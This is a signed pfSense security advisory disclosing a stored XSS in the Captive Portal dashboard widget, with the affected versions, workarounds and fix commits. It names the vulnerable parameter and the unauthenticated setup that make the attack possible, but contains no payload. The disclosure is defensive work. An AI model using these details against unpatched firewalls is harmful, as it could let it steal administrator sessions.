-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-26_05.webgui Security Advisory pfSense Topic: Stored XSS in Captive Portal Dashboard widget Category: pfSense Base System and Captive Portal Module: webgui Announced: 2026-04-29 Credits: Ivan Lepies Affects: pfSense Plus software versions <= 26.03 pfSense CE software versions <= 2.8.1 Corrected: 2026-04-07 18:23:14 UTC (pfSense Plus master, 26.07) 2026-04-07 18:23:14 UTC (pfSense CE master, 2.9.0) 0. Revision History v1.0 2026-04-29 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description A potential stored Cross-Site Scripting (XSS) vulnerability was identified in captive_portal_status.widget.php, a component of the pfSense Plus and pfSense CE Software GUI, when used with Captive Portal configured for unauthenticated access. A malicious client on a local network connected to an interface with the Captive Portal service active and configured with an authentication type of "None" can send a specially-crafted username containing an XSS payload in the auth_user parameter. As the Captive Portal is not configured for authentication in this case, it considers the username irrelevant and does not validate the username. However, it still accepts and stores the username from the client. The Captive Portal Dashboard Widget displays the usernames without encoding as long as the client is connected through the Captive Portal. This problem is present on pfSense Plus version 26.03, pfSense CE version 2.8.1, and earlier versions of both. III. Impact Due to the lack of validation and encoding on the username contents, the captive_portal_status.widget.php Dashboard Widget is susceptible to XSS when used with Captive Portal configured for unauthenticated access. Arbitrary JavaScript could be executed in the user's browser. The user's session cookie or other information from the session may be compromised. This does not affect the Captive Portal Status page, nor does it affect other authenticated Captive Portal configurations. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: * Remove the Captive Portal widget from the Dashboard * Configure Captive Portal to use some form of authentication * Do not log into the firewall with the same browser used for non- administrative web browsing. V. Solution Users can upgrade to pfSense Plus software version 26.07 or later, or pfSense CE software versions after 2.8.1 when available. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus versions 26.03 or 25.11.1, and pfSense CE version 2.8.1 may apply the fix from the recommended patches list in the System Patches package after installing or updating the System Patches package. Users may also manually apply the relevant revisions using the System Patches package on earlier versions, or by manually making similar changes to the affected files if the patches do not apply directly. Visit the Redmine issue URL in the References section to obtain the patch content. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- plus/plus-master 1519891f7636e8e2f7d13d051dc53a6c30366668 pfSense/master 1519891f7636e8e2f7d13d051dc53a6c30366668 - - ------------------------------------------------------------------------- VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmnyLMMACgkQE7mH/ZIU +NrtDQ/+MqqKijd+TF9g8ndI2QQs9WzipLIaAIAkZP8GIRJuqbBhskJrmrY5uhi1 f/AuEF14sWdJtCptC7ZZ0ybdZcngISXoO7s/kixFySTOuLPgdcNjghlxbICHy8Gz Il8nAa6VnjNYAkZJxq8oqbumBywERo66o7fxcHc9iJ51vYFByVGLvZSC4fojkbgM 0U17b1Vi5I+6aEGnZwJiAoiVdQScnwMo0fZNlQoo3aUOgFItB6HmDh+MEz682hsb PTNcNDCNYFt9OIbI4l0yDlpIlPtgLGWRsz6yVJ72ZixqUV6vseWUYCoOyaXhkybU LFXZ4wOklCgBUPuV+baOtk3grRot/N+z7inwh2q9KB4f32NUMpMFW1CGKWmlgkxq LSm0a+x9z6CDk7PRR+cZtvgrrHSst8i6b/5bJh5ZbTMhAW5VoDQ14wPr7T7eJEaM QMIXj1I7k/bOKLil/PNcf6jKPZ/CMhgLZPsyfvtjw2jxwclh0t3koWch1T99Trrm G54KKp537NV0zCIvPrIX8B6fUyCvdK2nXYBIn2NnU29NVjEFV5GDn5nljxZEm5TI 2O+KNMirjhSKGlzQJJ4Nol8LO9JphAPhqsh8kx8wBwOzPFI1bLawGkYHC8Hn/V8s G2to/w4x3d/amAIYnzu6bMt9A23YQYJX2lK5tk/x0ivABPQk2l4= =uGPS -----END PGP SIGNATURE-----